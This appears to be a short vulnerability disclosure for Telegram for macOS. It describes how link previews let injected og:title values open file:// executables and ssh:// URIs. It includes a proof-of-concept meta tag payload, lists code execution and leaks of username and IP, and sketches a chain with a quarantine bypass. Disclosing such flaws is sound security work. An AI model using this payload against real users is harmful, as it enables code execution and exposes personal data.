In Telegram for macOS v4.9.155353 (and below) URL parsing logic in Telegram for macOS platform allows running arbitrary executables and applications URI schemes via links injected into the website's preview.
- Send a link to
exploit.html- a regular HTML file with
<meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />tag
- Website preview renders
- Click on the rendered links behaves as
NSWorkspace.openutil -> if points to executable -> code execution.
- Click on
Terminal.apppopups with an active ssh session disclosing user's OS username, ip and other details.
The bug could be used...
- to disclose info about user's machine -> OS username, IP, etc
- to run arbitrary executables and opening arbitrary files on OS
- to launch arbitrary applications via URI schemes
This bug could be chained with Quarantine issue to open downloaded quarantine-ignored files and chain this into running of attacker-supplied executable.
This bug also exists in iOS, PoC is the same. Impact possibly limited to URI schemes.